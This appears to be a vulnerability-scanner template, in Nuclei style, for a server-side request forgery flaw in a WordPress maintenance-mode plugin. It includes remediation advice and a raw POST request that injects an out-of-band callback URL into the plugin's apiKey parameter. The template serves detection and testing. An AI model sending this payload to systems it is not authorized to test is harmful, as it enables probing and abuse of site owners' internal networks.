id: wp-under-construction-ssrf
info:
  name: Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request
    Forgery (SSRF)
  author:
  - l0ne1y
  description: |-
    Server request forgery vulnerability exists in WordPress Under Construction, Coming Soon & Maintenance Mode
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers.

    The includes/mc-get_lists.php file uses the 'apiKey' POST parameter to create an https URL from it, without sanitizing it, and calls it using cURL, causing SSRF issues.
    The issue can be exploited via direct access to the affected files and ucmm_mc_api AJAX calls (available to both authenticated and unauthenticated users)
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. Filter the response of the intranet server to the request of the public network server. If the web application obtains files of a certain type, it should first verify whether the returned information meets the file type standards before displaying the returned results to the user. For example, the returned information should be pictures. If the returned information is HTML, stop returning the returned information to the client.
    2. Unify the error prompt information to prevent users from judging the port status of the remote server based on the error information.
    3. On the firewall of the intranet server, limit the request port of the public network server to the common ports of HTTP and other protocols, such as: 80, 443, 8080, 8090.
    4. If there is no business communication between the intranet IP of the public network server and the intranet, it is recommended to blacklist the intranet IP corresponding to the public network server to prevent applications from being used to obtain intranet data.
    5. The intranet server disables unnecessary protocols and only allows HTTP and HTTPS requests to prevent security issues caused by protocols such as file:///, gopher://, ftp://, etc.
requests:
- matchers:
  - type: word
    part: interactsh_protocol
    words:
    - http
  raw:
  - |
    POST /wp-admin/admin-ajax.php HTTP/2
    Host: {{Hostname}}
    Origin: {{BaseURL}}
    Content-Type: application/x-www-form-urlencoded

    action=ucmm_mc_api&apiKey=-{{interactsh-url}}%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D
